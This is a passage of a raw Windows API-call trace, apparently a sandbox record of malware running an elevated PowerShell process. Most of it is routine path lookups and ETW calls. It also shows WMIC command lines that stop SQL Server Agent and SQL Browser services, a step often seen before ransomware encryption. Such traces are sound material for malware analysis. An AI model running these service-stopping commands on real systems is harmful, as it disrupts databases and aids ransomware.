CoTaskMemFree (pv=0x870068) [0275.187] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4de8fc0 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice", lpProcessInformation=0x4de8fc0*(hProcess=0x97c, hThread=0x978, dwProcessId=0x1220, dwThreadId=0x1228)) returned 1 [0275.201] CloseHandle (hObject=0x978) returned 1 [0275.201] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0275.202] GetCurrentProcess () returned 0xffffffff [0275.202] GetCurrentProcess () returned 0xffffffff [0275.202] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x97c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x978) returned 1 [0275.202] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x978, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0277.271] CloseHandle (hObject=0x978) returned 1 [0277.272] GetExitCodeProcess (in: hProcess=0x97c, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0277.272] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0277.293] CloseHandle (hObject=0x97c) returned 1 [0277.293] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x46, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.295] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x46, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.295] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x44, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x44, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.295] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x44, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.295] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x45, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x45, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.296] SetEvent (hEvent=0x7f4) returned 1 [0277.296] SetEvent (hEvent=0x804) returned 1 [0277.296] SetEvent (hEvent=0x7fc) returned 1 [0277.296] SetEvent (hEvent=0x7f8) returned 1 [0277.297] SetEvent (hEvent=0x80c) returned 1 [0277.297] SetEvent (hEvent=0x7f0) returned 1 [0277.297] SetEvent (hEvent=0x7ec) returned 1 [0277.297] SetEvent (hEvent=0x808) returned 1 [0277.297] SetEvent (hEvent=0x970) returned 1 [0277.297] SetEvent (hEvent=0x968) returned 1 [0277.298] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0277.303] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0277.306] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x4e99b4c6, Data2=0xda68, Data3=0x4777, Data4=([0]=0x96, [1]=0xf4, [2]=0xad, [3]=0x44, [4]=0x32, [5]=0x32, [6]=0x58, [7]=0x4))) returned 0x0 [0277.306] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=37234108222) returned 1 [0277.307] AmsiOpenSession () returned 0x0 [0277.307] AmsiScanString () returned 0x80070015 [0277.321] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=37235585905) returned 1 [0277.321] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0277.322] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.322] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x45, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.322] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.322] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.322] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.323] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.324] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0277.325] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0277.325] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0277.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0277.326] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0277.326] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0277.326] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0277.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0277.327] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0277.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0277.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0277.327] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0277.327] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0277.328] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0277.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0277.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0277.329] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0277.329] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0277.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0277.329] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0277.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0277.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0277.330] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0277.330] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0277.330] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0277.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0277.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0277.331] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0277.331] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0277.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0277.331] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0277.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0277.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0277.332] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0277.332] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0277.332] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0277.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0277.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0277.332] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0277.332] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0277.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0277.332] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0277.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0277.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0277.333] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0277.333] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0277.333] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c8a0 [0277.333] FindNextFileW (in: hFindFile=0x7e1c8a0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0277.333] FindClose (in: hFindFile=0x7e1c8a0 | out: hFindFile=0x7e1c8a0) returned 1 [0277.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0277.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0277.334] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0277.334] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.334] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4d, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.334] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0277.334] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0277.335] GetConsoleWindow () returned 0x302b8 [0277.339] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0277.339] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0277.340] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0277.340] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0277.341] CoTaskMemFree (pv=0x7e29450) [0277.341] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4df8668 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice", lpProcessInformation=0x4df8668*(hProcess=0x9b0, hThread=0x9ac, dwProcessId=0x8, dwThreadId=0x518)) returned 1 [0277.364] CloseHandle (hObject=0x9ac) returned 1 [0277.364] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0277.365] GetCurrentProcess () returned 0xffffffff [0277.365] GetCurrentProcess () returned 0xffffffff [0277.365] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x9b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x9ac) returned 1 [0277.365] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x9ac, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0279.791] CloseHandle (hObject=0x9ac) returned 1 [0279.793] GetExitCodeProcess (in: hProcess=0x9b0, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0279.794] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0279.802] CloseHandle (hObject=0x9b0) returned 1 [0279.802] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.804] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0279.805] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4c, [1]=0x52, [2]=0xae, 